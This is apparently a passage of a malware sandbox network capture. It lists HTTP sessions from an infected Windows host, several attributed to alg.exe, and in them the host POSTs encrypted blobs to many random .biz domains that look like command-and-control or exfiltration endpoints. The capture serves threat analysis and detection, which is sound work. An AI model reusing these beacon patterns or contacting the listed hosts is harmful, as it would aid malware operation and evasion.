                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:29.986228943 CET | 834 | OUT | Data Raw: d8 5a 08 cf b7 35 48 d7 36 03 00 00 dd 77 ef 64 7d 6e 75 fd 6d 36 82 d7 3b 14 01 56 7f 05 bf fc f2 2a 1b 54 0b 95 c8 78 7c 3f 1e 27 f8 d2 60 1f 9c 25 96 1e 4c 76 90 b1 ed c4 74 0d 75 e0 84 2c 0d d1 cd 42 72 33 a5 e0 13 10 ad 46 ef ad 2e f7 31 27
Nov 18, 2024 09:59:30.829483986 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8348a08df58ce3e1588a767a6c71a1c3|155.94.241.187|1731920370|1731920370|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.10 | 50098 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:30.827760935 CET | 352 | OUT | POST /arqdlqnxd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:30.827819109 CET | 778 | OUT | Data Raw: c8 47 75 95 28 ca 45 5d fe 02 00 00 77 6f 0b a3 61 c7 14 5d 58 96 54 cc d2 6d 89 fa ea 79 f6 c9 f6 4e 8f 06 da 53 61 16 23 a3 db 30 fc 32 39 3b f8 23 fa 92 e0 ed 08 76 07 45 e1 45 f9 cc 6e 93 05 0c 15 26 75 4e 60 fb f6 5e 7b d3 3a ba cd 25 d1 a0
Nov 18, 2024 09:59:31.522224903 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=998ace3b0656627aef46e29f1a5f310d|155.94.241.187|1731920371|1731920371|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
120 | 192.168.2.10 | 50099 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:30.847132921 CET | 359 | OUT | POST /xfpfkqjakhgaed HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:30.847132921 CET834OUTData Raw: cd 4b b3 82 f2 3a 03 76 36 03 00 00 a4 5a 63 46 92 a3 92 30 ed 0c 54 f7 92 01 90 e9 fe 25 e6 5d 75 02 0d 23 6a c6 b7 c5 e0 86 29 83 c5 44 e8 b3 4f 8e 27 74 7c 83 54 df 0e 8e c1 31 8f 47 47 80 f8 84 18 54 6c 42 88 7a a1 5a ef 8c e6 19 67 9c bb eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K:v6ZcF0T%]u#j)DO't|T1GGTlBzZgh-{|kUq3B0rOLc!K`|ol@[<k%>YrRdA><5;|)<*g ^htH~'$[^"-5?W
Nov 18, 2024 09:59:31.542630911 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6e1995f82b987f5976395042b2ac8ee3|155.94.241.187|1731920371|1731920371|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
121 | 192.168.2.10 | 50100 | 18.246.231.120 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:31.597117901 CET | 353 | OUT | POST /enixguayej HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:31.597150087 CET | 834 | OUT | Data Raw: 2d fa 69 89 0f 3d 27 fb 36 03 00 00 a6 af 9a ff 21 1d b3 b0 6e 57 e8 39 e8 b0 f5 57 12 92 57 c6 58 b1 9b f9 3e 50 3a 58 c9 93 64 6b f5 64 82 b2 ef b3 8f fc f6 00 6c b8 ff bc 88 ae 97 0f a3 cc 64 c6 9f 22 20 c4 dc d8 ec a5 84 e3 83 75 af df 2d 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -i='6!nW9WWX>P:Xdkdld" u-.2"Q["X"kB1>{F!zPK8j$4?\|JEEhZ$Y-'%-7iV]-&#3+wgu^*)d_~oeWG7CS5Pqo;
Nov 18, 2024 09:59:32.443185091 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=612566ed6f6c71c6f4463cc1447ca996|155.94.241.187|1731920372|1731920372|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.10 | 50101 | 34.211.97.45 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:31.849193096 CET | 344 | OUT | POST /ae HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:31.849193096 CET | 778 | OUT | Data Raw: 09 6c 41 bb 8f ba f0 18 fe 02 00 00 60 cc 3f 19 8b b2 6f ea a8 21 d7 a5 03 e8 74 66 92 7b be 31 06 ab 82 19 a1 f9 ed b7 8c a3 31 79 19 4e b7 50 73 fb 57 f9 d7 06 4a c4 8e 71 53 b2 d2 8c 0a 04 cc 27 a9 9e 5b 93 db 08 ca ac 42 8c 21 2c e4 d7 19 ea
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lA`?o!tf{11yNPsWJqS'[B!,+-K:dD_m3/yf@~S@sE=I2{*R4vF{kFivL}:?gVrv+kVhS|68BNfieqnR?4[VY7Xh
Nov 18, 2024 09:59:32.740752935 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c9f0937500275c0adafbd66c6ff61850|155.94.241.187|1731920372|1731920372|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
123 | 192.168.2.10 | 50102 | 3.254.94.185 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:32.470851898 CET | 349 | OUT | POST /olaxecwr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:32.470865965 CET834OUTData Raw: 87 7b 52 26 52 c2 c8 20 36 03 00 00 51 9b 7e 85 ef 84 12 f1 e6 aa df ba 76 96 67 8c 4e b0 c7 8e 54 9b 36 d3 8b a4 23 89 56 73 03 9d 5d 80 31 e6 5a 93 6b 46 08 d5 53 97 5b 21 10 5c 31 62 6c 6a 7f 89 82 59 16 2d 0a 67 60 73 17 ca 87 27 a6 60 e1 d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {R&R 6Q~vgNT6#Vs]1ZkFS[!\1bljY-g`s'`x4hs#*tx5['Q{'{~oPAC@w%gEg'D3t"jgMGHH&\Mn}Q}10Qb-6f<qTbJL-*=,t
Nov 18, 2024 09:59:33.446110010 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c3bf7ac60e8716f1681213b9dfc20218|155.94.241.187|1731920373|1731920373|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.10 | 50103 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:33.041922092 CET | 347 | OUT | POST /hb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.041944027 CET778OUTData Raw: aa f3 7c 61 26 ae ff fa fe 02 00 00 a4 50 1f 13 5d 2d 67 71 8e a4 06 06 58 9c 46 79 8e 8d 8e 03 0e 04 dd c6 71 e8 55 68 1a 1d 3d ee 07 22 17 b4 0b e1 6c 28 35 a8 3d 55 f4 ce ff 5b b4 91 53 da fd 61 3a c6 f6 25 b9 72 ea 42 c2 b3 15 f4 76 51 d1 0d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: |a&P]-gqXFyqUh="l(5=U[Sa:%rBvQ|/aOr<[p?bPCRb~k^;ylwtNr4+$Z%2,!YsdE)[lt4[t(Nx,\bCQ&HE.rh+(ri
Nov 18, 2024 09:59:33.731667995 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41e70c37423820b4c0ca060cb786b936|155.94.241.187|1731920373|1731920373|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
125 | 192.168.2.10 | 50104 | 85.214.228.140 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:33.464350939 CET | 354 | OUT | POST /rejcysylgt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:33.464365005 CET834OUTData Raw: 49 72 3d 78 a0 8c cb 75 36 03 00 00 e0 d0 3c 2f 44 94 52 08 15 49 bc f3 3a 43 2d b5 8c 82 7e c5 dd 91 e1 ab 1a 5d 85 ae c8 4d 59 d9 46 1f 44 6a 77 20 d2 c9 5d d0 88 b6 83 fe 69 27 1a 5a 8c 64 23 00 36 f5 36 56 14 10 db d2 cf 24 8b 54 f1 6e 8f 5a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Ir=xu6</DRI:C-~]MYFDjw ]i'Zd#66V$TnZzBqmI.:|]V==k\/)g(:g`K{UFNt&pv%UNYqn5KfDdg4KwMk {
Nov 18, 2024 09:59:34.334382057 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 404 page not found
Nov 18, 2024 09:59:34.335889101 CET | 347 | OUT | POST /gsd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:34.335947037 CET | 834 | OUT | Data Raw: 72 29 6b 20 85 fd 0e 20 36 03 00 00 25 a4 7c d3 69 a8 a4 5d 4a 49 4f cb 6f 3b 0a 21 ff 29 d0 f9 62 40 ee 9f 04 8f e9 f3 48 b9 68 69 6a 80 a1 21 01 1f 3f 4e ce 40 4e f5 ff 64 ff 57 52 86 cc a6 20 f3 58 f7 d0 06 51 05 1d 77 45 93 91 a0 59 ce a3 16
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r)k 6%|i]JIOo;!)b@Hhij!?N@NdWR XQwEY%$+[?g@(8o1E_V{b|CWas#]w]@6eQl\.iS}"Sr\/KWqC[yfDxrY[FTz^
Nov 18, 2024 09:59:34.599811077 CET | 176 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.10 | 50105 | 3.254.94.185 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:33.973964930 CET | 355 | OUT | POST /luiqxxselqgi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:33.973992109 CET | 778 | OUT | Data Raw: e9 33 82 bd 8a db 2f 0c fe 02 00 00 60 b0 5a 84 33 0d a1 f0 9e 0e 8a 4d d3 f6 59 18 84 e3 d7 a6 82 f0 78 50 6c 76 dd 65 6a 07 fe 05 ae 16 31 22 e9 4f 39 44 bb 9f dd 6e ed 81 4d ca cd 7e 6a 22 20 26 b4 0f 06 41 48 9e 16 11 9a 10 aa 06 f0 f4 93 6a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3/`Z3MYxPlvej1"O9DnM~j" &AHj!)96-wJYMxqDe>"&w9:YA6mdpU4y@y%|sKZllfU0|jlyb
Nov 18, 2024 09:59:34.936739922 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=903a41757afc21d39576d0473596c05a|155.94.241.187|1731920374|1731920374|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
127 | 192.168.2.10 | 50106 | 47.129.31.212 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:34.621809006 CET | 355 | OUT | POST /ikgnytocxhbn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:34.621815920 CET | 834 | OUT | Data Raw: 0b 34 eb 5e ab 87 9d 8c 36 03 00 00 ec 46 45 b8 11 ae 5e 85 fb aa 36 27 25 da 1a d0 bc 1d 71 9c cb 22 56 30 66 37 74 4f 6a a6 26 98 9a 41 c4 81 d3 dd c3 62 f4 9b c5 3a 38 38 e1 ac 7e 62 d0 a0 88 1f eb 1d 1e 6f 67 df 5e 28 53 1a f1 03 54 e5 4b 85
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4^6FE^6'%q"V0f7tOj&Ab:88~bog^(STKVu>5iZF8N"U+MH6<xfp>q-&=ym4@ihTem[p+Jc:vGD1oqW0T=Ro% `6
Nov 18, 2024 09:59:36.088676929 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=05d43ec64911a2c9c603733e41dd05d0|155.94.241.187|1731920375|1731920375|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.10 | 50107 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:35.130541086 CET | 353 | OUT | POST /sjbqcomcuhgq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:35.130562067 CET | 778 | OUT | Data Raw: f3 61 c5 82 ba 39 f9 ec fe 02 00 00 dc 18 9b 4b 4d 66 e9 17 ab bf 9a 8a 96 b1 86 aa 6c 76 e4 44 88 6b 82 41 f3 87 d2 2d d7 c0 f7 5d da 3d b9 8e cc 06 e1 ca d5 01 47 5c 1a 8b 91 31 bc 75 ec 86 51 c8 f1 cd a0 52 f2 bd 6c b5 72 c7 88 3b 75 b6 90 77
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a9KMflvDkA-]=G\1uQRlr;uw$eG71K9MY28wGvr!Pn@81LX}T0G_pc=7g:[c{jr$A2)|9F<p?yv_R44]5)f\2F6'qX_r+
Nov 18, 2024 09:59:35.972781897 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9593da6cb14a3c8837049217c3cc60ce|155.94.241.187|1731920375|1731920375|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


